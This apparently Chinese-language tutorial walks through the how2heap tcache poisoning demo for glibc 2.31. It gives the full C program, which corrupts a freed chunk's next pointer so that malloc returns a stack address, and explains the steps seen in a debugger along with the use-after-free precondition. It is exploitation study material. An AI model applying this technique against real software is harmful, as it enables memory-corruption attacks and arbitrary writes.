tcache_poisoning 2.31

依然还是将非堆段地址作为伪造堆块挂进tcache bin中,重新申请作为正常堆块启用


  1 #include <stdio.h> 2 #include <stdlib.h>3 #include <stdint.h>4 #include <assert.h>5 6 int main()7 {8         // disable buffering9         setbuf(stdin, NULL);10         setbuf(stdout, NULL);11 12         printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"13                    "returning a pointer to an arbitrary location (in this case, the stack).\n"14                    "The attack is very similar to fastbin corruption attack.\n");15         printf("After the patch;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"16                    "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");17 18         size_t stack_var;19         printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);20 21         printf("Allocating 2 buffers.\n");22         intptr_t *a = malloc(128);23         printf("malloc(128): %p\n", a);24         intptr_t *b = malloc(128);25         printf("malloc(128): %p\n", b);26 27         printf("Freeing the buffers...\n");28         free(a);29         free(b);30 31         printf("Now the tcache list has [ %p -> %p ].\n", b, a);32         printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"33                    "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);34         b[0] = (intptr_t)&stack_var;35         printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);36 37         printf("1st malloc(128): %p\n", malloc(128));38         printf("Now the tcache list has [ %p ].\n", &stack_var);39 40         intptr_t *c = malloc(128);41         printf("2nd malloc(128): %p\n", c);42         printf("We got the control\n");43 44         assert((long)&stack_var == (long)c);45         return 0;46 }






接下来在40行下断点,重新申请一个0x90大小的堆块,将bin中的chunk_b申请出来,由于chunk_b的fd指针指向的是stack_var,所以在bin中的表现形式为chunk_b --> stack_var。因此当chunk_b被启用后,挂在tcache bin头部的堆块就变成了stack_var:

最后在44行下断点,申请一个0x90大小的堆块chunk_c,这个时候由于tcache bin的头部为stack_var,并且stack_var挂在的0x90这串链表中,所以stack_var就被作为一个堆块启用了:


  • 比较基础的修改堆块fd指针的操作
  • 如果想要利用该技巧,需要能够对释放堆块进行写操作,那么就说明释放之后堆块的malloc指针没有被清空

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